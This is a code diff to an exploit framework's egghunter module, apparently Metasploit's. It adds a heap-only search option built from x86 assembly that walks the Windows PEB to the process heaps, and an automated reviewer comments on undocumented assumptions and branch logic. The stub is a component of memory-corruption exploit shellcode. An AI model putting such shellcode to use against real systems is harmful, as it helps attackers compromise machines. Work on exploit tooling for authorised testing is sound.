diff --git a/lib/rex/exploitation/egghunter.rb b/lib/rex/exploitation/egghunter.rb
index 3155db3662..509837f334 100644
--- a/lib/rex/exploitation/egghunter.rb
+++ b/lib/rex/exploitation/egghunter.rb
@@ -23,6 +23,7 @@ module Exploitation
 # Startreg code added by corelanc0d3r
 # Added routine to disable DEP for discovered egg (for win, added by corelanc0d3r)
 # Added support for searchforward option (true or false)
+# Added support for heap-only search option (true or false)
 #
 ###
 class Egghunter
@@ -58,6 +59,11 @@ class Egghunter
 else
 startstub = "\n\tjmp next_addr"
 end
+ # search only in heap?
+ elsif opts[:heaponly]
+ startstub = "\n\tpush 0x30\n\tpop edx\n\tmov edx,fs:[edx]"
+ startstub << "\n\tadd dl,0x90\n\tmov edx,[edx]"
+ startstub << "\n\tmov edx,[edx]\n\tjmp next_addr"
 end
 startstub << "\n\t" if startstub.length > 0
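Review bot: The `elsif opts[:heaponly]` branch hard-codes the 32-bit Windows PEB layout (`fs:[0x30]` is the PEB, `+0x90` is ProcessHeaps) and `add dl,0x90` only works because the PEB base's low byte is zero, yet the sole comment is `# search only in heap?`; add a comment stating those assumptions, e.g. `# x86 Windows only: fs:[0x30] = PEB, PEB+0x90 = ProcessHeaps; the first heap base becomes the search start (add dl relies on the page-aligned PEB)`. Because it is an `elsif`, `:heaponly` is silently ignored whenever the preceding branch's option is also set, which deserves a line in the option documentation — the method's option list is outside the hunk, so I cannot confirm `:heaponly` was added there. The comment also sits before the `elsif` at the inner body's indentation, where it reads as trailing the previous branch; move it to directly after the `elsif opts[:heaponly]` line. The enclosing `if` starts outside the hunk.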